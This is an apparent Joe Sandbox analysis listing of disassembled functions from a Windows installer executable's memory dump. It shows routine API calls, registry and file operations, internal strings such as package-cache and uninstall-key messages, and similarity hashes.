Function 000FA20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000F3479,000F3479,?,?,?,000FA45C,00000001,00000001,ECE85006), ref: 000FA265
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000FA45C,00000001,00000001,ECE85006,?,?,?), ref: 000FA2EB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000FA3E5
__freea.LIBCMT ref: 000FA3F2

Part of subcall function 000F521A: HeapAlloc.KERNEL32(00000000,?,?,?,000F1F87,?,0000015D,?,?,?,?,000F33E0,000000FF,00000000,?,?), ref: 000F524C

__freea.LIBCMT ref: 000FA3FB
__freea.LIBCMT ref: 000FA420

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: d8a7e0553d3bf7c344d629fbc43a2e99bbfb82e2d038d76c5077e63ebd6865b1
Instruction ID: 9e6190834a4056082654e198148fa1c6ab08d63536f6c3e925cc5b67f86bd7ab
Opcode Fuzzy Hash: d8a7e0553d3bf7c344d629fbc43a2e99bbfb82e2d038d76c5077e63ebd6865b1
Instruction Fuzzy Hash: F45105B2B1021AAFDB298E64CC41EBF37A9EF46750F144229FE08D6541EB74ED80A651

Function 000D8CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 000D8D18

Strings

Failed to get old %hs package cache root directory., xrefs: 000D8DB8
per-machine, xrefs: 000D8D69, 000D8DA9
Failed to calculate cache path., xrefs: 000D8CD5
per-user, xrefs: 000D8D72, 000D8D77, 000D8DB2, 000D8DB7
Failed to get %hs package cache root directory., xrefs: 000D8D78

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: 380f611d6ea6e3b6bce71572fe9f9959f0a9d63be8d1fe63a14fb416fc63b701
Instruction ID: 6c3a894b2125ef51b1b158621e96a9777512d619a8db6f9f1170b2d8ef8acf7a
Opcode Fuzzy Hash: 380f611d6ea6e3b6bce71572fe9f9959f0a9d63be8d1fe63a14fb416fc63b701
Instruction Fuzzy Hash: 2831AF72A40314BBEB22AA648D46FBE736E9F24750F118026FD04B63C2DB769D4097B1

Function 000DE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 000DE985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 000DE994
SetWindowLongW.USER32(?,000000EB,?), ref: 000DE9A8
DefWindowProcW.USER32(?,?,?,?), ref: 000DE9B8
GetWindowLongW.USER32(?,000000EB), ref: 000DE9D2
PostQuitMessage.USER32(00000000), ref: 000DEA31

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: fa61d6de2d88bb494aed98314a36f1fe264df5c0a98f170351403e575a1544af
Instruction ID: e05942e41b01a9150b297aa4a677ca7a24969b53595efed3324bf96ffb79f064
Opcode Fuzzy Hash: fa61d6de2d88bb494aed98314a36f1fe264df5c0a98f170351403e575a1544af
Instruction Fuzzy Hash: 8621F531104205BFDF11AFA8DC48EAE3B66FF44310F244619FA0A9E2A4C731ED50DB61

Function 000DC7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 000DC811
CloseHandle.KERNEL32(?), ref: 000DC819

Strings

Unexpected elevated message sent to child process, msg: %u, xrefs: 000DC9C4
elevation.cpp, xrefs: 000DC9B8
Failed to save state., xrefs: 000DC891

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: aa0a21dd13815369b0b0d5e54d20bee558e1cee0be5a1aeea5893a62055e3eac
Instruction ID: deddc0b7b6212bb9f2a8d1d368d6588e84753ca6a428a25a592a9550ce085a92
Opcode Fuzzy Hash: aa0a21dd13815369b0b0d5e54d20bee558e1cee0be5a1aeea5893a62055e3eac
Instruction Fuzzy Hash: C061D63A100605EFDB225F84CD05C69BBB2FF08314715C55AFAA99A632C732E821EF55

Function 00101217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0010123F
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,000D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00101276
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0010136E

Strings

regutil.cpp, xrefs: 001012BF
BundleUpgradeCode, xrefs: 0010121E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: fe5d72ab7643677ce6337aac8893f41776cc21c75b6da0131d543d4131f5c4fc
Instruction ID: b60d30ebfe051eb90f717d6d7f90d2e3dc7711b7fe8101461f54fe92ebe76695
Opcode Fuzzy Hash: fe5d72ab7643677ce6337aac8893f41776cc21c75b6da0131d543d4131f5c4fc
Instruction Fuzzy Hash: 4B41D331A0021AFFCB259F94C880ABEB7A9FB44720F254169FD41EF680D7B49D00CBA0

Function 00106357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,000D8770,00000000,00000000,00000000,00000000,00000000), ref: 00104925
Part of subcall function 0010490D: GetLastError.KERNEL32(?,?,?,000D8770,00000000,00000000,00000000,00000000,00000000), ref: 0010492F

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00105C09,?,?,?,?,?,?,?,00010000,?), ref: 001063C0
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00105C09,?,?,?,?), ref: 00106412
GetLastError.KERNEL32(?,00105C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00106458
GetLastError.KERNEL32(?,00105C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 0010647E

Strings

dlutil.cpp, xrefs: 001064A2

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: b4262c082d7d95633e8ddcd25c1cbdff4563732f041f395c76b425e7060a43ec
Instruction ID: b83898ba67113117134d56950238716cad3f676b5976cdc9777150ae699e8a01
Opcode Fuzzy Hash: b4262c082d7d95633e8ddcd25c1cbdff4563732f041f395c76b425e7060a43ec
Instruction Fuzzy Hash: 61418B7290022ABFEB218E94CD85BEE7B68FF04724F154225BD84E61D0D7B1DD60DBA0

Function 000C2428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,000FFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000FFFEF,000E12CF,?,00000000), ref: 000C246E
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000FFFEF,000E12CF,?,00000000,0000FDE9,?,000E12CF), ref: 000C247A

Part of subcall function 000C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,000C21CC,000001C7,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3BDB
Part of subcall function 000C3BD3: HeapSize.KERNEL32(00000000,?,000C21CC,000001C7,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3BE2

Strings

strutil.cpp, xrefs: 000C249E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 8a824ab9b16ecd72cd4552cff28ee0cba42e405f1a66943c75a1b108b63e9bc6
Instruction ID: 1c25c8a8c65fbdf333cc0dbc35cf12fa6d29e5227014fcc815647f5f606fa5b3
Opcode Fuzzy Hash: 8a824ab9b16ecd72cd4552cff28ee0cba42e405f1a66943c75a1b108b63e9bc6
Instruction Fuzzy Hash: F631E33030061AAFE7249F698CC4FAF33DDAB44364B10422DFE119BAA0EB71CC4197A0

Function 000EAD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000EADB3

Strings

Failed to extract payload: %ls from container: %ls, xrefs: 000EAE3E
Failed to extract all payloads from container: %ls, xrefs: 000EADF7
Failed to open container: %ls., xrefs: 000EAD85
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 000EAE4A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1825529933-3891707333
Opcode ID: c092e29c8151ef9bc01f01b4a03b0c5b9593700105f79a843f16250153d68fa6
Instruction ID: a79e81201f7104df356535d3223f30e5636ca578387957ad74ec83ec3c084f97
Opcode Fuzzy Hash: c092e29c8151ef9bc01f01b4a03b0c5b9593700105f79a843f16250153d68fa6
Instruction Fuzzy Hash: F131E332E04155BFCF22ABE5CC46EDE77A8AF09710F104221FD11B7292E771AA54DBA1

Function 000CF005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,000D0654,00000001,00000001,00000001,000D0654,00000000), ref: 000CF07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,000D0654,00000001,00000001,00000001,000D0654,00000000,00000001,00000000,?,000D0654,00000001), ref: 000CF09A

Strings

PackageVersion, xrefs: 000CF05E
Failed to remove update registration key: %ls, xrefs: 000CF0C7
Failed to format key for update registration., xrefs: 000CF033

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: 4327c15faaba7439d8afe53f032c106d399d78b81de940062ff1df418916a0c2
Instruction ID: 8a8b87833780fed92855a6ffb50d1e5a023daf1ed84a76b053830042d6183552
Opcode Fuzzy Hash: 4327c15faaba7439d8afe53f032c106d399d78b81de940062ff1df418916a0c2
Instruction Fuzzy Hash: 6121A931D0112ABBDB219BA5CC49FBFBFB9DF04B20F204179FD54A2192E7714A40D691

Function 0010433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00104440: FindFirstFileW.KERNEL32(000E923A,?,00000100,00000000,00000000), ref: 0010447B
Part of subcall function 00104440: FindClose.KERNEL32(00000000), ref: 00104487

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00104430

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

Part of subcall function 00101217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0010123F
Part of subcall function 00101217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,000D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00101276

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0010436F
crypt32.dll, xrefs: 00104368
\, xrefs: 001043B9
PendingFileRenameOperations, xrefs: 0010439B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: a8c3e3b73c12b259618fe8bc2db736b054da70aef50bf2d73a599fd116f2cfe1
Instruction ID: 8188229b443e34a38ced3bbf301e37fa54fc4f4374fa2693253389dda277e908
Opcode Fuzzy Hash: a8c3e3b73c12b259618fe8bc2db736b054da70aef50bf2d73a599fd116f2cfe1
Instruction Fuzzy Hash: BC3191B1A00219FBDF21AF91CCC1AAEB775FB00750F55817AFA84EA1A1D7B19E50CB50

Function 00104019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,000C4DBC,00000000,?,?,00000000,?,0010412D,00000000,000C4DBC,00000000,00000000,?,000D85EE,?,?), ref: 00104033
GetLastError.KERNEL32(?,0010412D,00000000,000C4DBC,00000000,00000000,?,000D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00104041
CopyFileW.KERNEL32(00000000,000C4DBC,00000000,000C4DBC,00000000,?,0010412D,00000000,000C4DBC,00000000,00000000,?,000D85EE,?,?,00000001), ref: 001040AC
GetLastError.KERNEL32(?,0010412D,00000000,000C4DBC,00000000,00000000,?,000D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 001040B6

Strings

fileutil.cpp, xrefs: 001040D5

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: ff96768918263cc9572f5946a2e8ce5f7fc3441b67e51af8170d50d96a7aaeb4
Instruction ID: 31403a37bb3d56669c3044260c7b32378fda02d40d09b53e668751ca69531e88
Opcode Fuzzy Hash: ff96768918263cc9572f5946a2e8ce5f7fc3441b67e51af8170d50d96a7aaeb4
Instruction Fuzzy Hash: E421B3F660133697DB300A965CC0BFB6698EF14B60B150135FF84FB595D7E18C8092E1

Function 000CEF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000CEF56

Part of subcall function 00104153: SetFileAttributesW.KERNEL32(000E923A,00000080,00000000,000E923A,000000FF,00000000,?,?,000E923A), ref: 00104182
Part of subcall function 00104153: GetLastError.KERNEL32(?,?,000E923A), ref: 0010418C

Part of subcall function 000C3C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,000CEFA1,00000001,00000000,00000095,00000001,000D0663,00000095,00000000,swidtag,00000001), ref: 000C3C88

Strings

swidtag, xrefs: 000CEF65
Failed to allocate regid folder path., xrefs: 000CEFBC
Failed to allocate regid file path., xrefs: 000CEFB5
Failed to format tag folder path., xrefs: 000CEFC3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: bc152527fdcbfa6e95448dd3462e6550abcc294518cce213cb567c6d1c4c33fb
Instruction ID: 1801aa6cf4993959e8f47f40effc9473b9c300a690d7fd5dab2e0aaa5c5a1e23
Opcode Fuzzy Hash: bc152527fdcbfa6e95448dd3462e6550abcc294518cce213cb567c6d1c4c33fb
Instruction Fuzzy Hash: 33217A31D00558BBCB25EB99CC41F9DFBB5AF54310F20C0BDF514A62A2D7719A829B90

Function 000E8DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 000E8E3A
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,000CF7E0,00000001,00000100,000001B4,00000000), ref: 000E8E88

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 000E8DD7
Failed to open uninstall registry key., xrefs: 000E8DFD
Failed to enumerate uninstall key for related bundles., xrefs: 000E8E99

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: d7b761c4464557f3587db30e0c2f922e969047c9ac9467d423598be6b3089f26
Instruction ID: 5d7945d9b5db575e926a722af02b8a9c841dfcb29a46eacb2bdf3f1a74e4c1f0
Opcode Fuzzy Hash: d7b761c4464557f3587db30e0c2f922e969047c9ac9467d423598be6b3089f26
Instruction Fuzzy Hash: 2D21C932900258FFDB26AA95CC46FEEBAB9EB04720F148564F85476190DB750E90E790

Function 001032F3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00103309
SysAllocString.OLEAUT32(?), ref: 00103325
VariantClear.OLEAUT32(?), ref: 001033AC
SysFreeString.OLEAUT32(00000000), ref: 001033B7

Strings

xmlutil.cpp, xrefs: 0010333C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: dd7b18e699eec3803b7f4f8898a5e9bc3007dceb68791115084a2d4fac6d0662
Instruction ID: 3db673402974ea83b8df49ecf800b9d1969b120322c4889d930c67bc982cc4c7
Opcode Fuzzy Hash: dd7b18e699eec3803b7f4f8898a5e9bc3007dceb68791115084a2d4fac6d0662
Instruction Fuzzy Hash: 98219135901219AFCB11DF94C888FAEBBBDBF44B11F154158F951AF250CFB19E408B90

Function 000ED259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000ED2EE
ReleaseMutex.KERNEL32(?), ref: 000ED31C
SetEvent.KERNEL32(?), ref: 000ED325

Strings

Failed to allocate buffer., xrefs: 000ED29D
NetFxChainer.cpp, xrefs: 000ED293

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 41906d93e83b0a7868e8708baef1c7ca2631bcd19d830e3e613614a3931790df
Instruction ID: 7df59175af7fb144674e2baed2294d9c84fc667bdb9c586d7595812a40be9fa3
Opcode Fuzzy Hash: 41906d93e83b0a7868e8708baef1c7ca2631bcd19d830e3e613614a3931790df
Instruction Fuzzy Hash: 6521A1B4604346BFDB10AF68D884A9DBBF5FF58320F10C629F964A7352C7B1A9508B90

Function 00105907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,000E6B11,00000000,?), ref: 0010591D
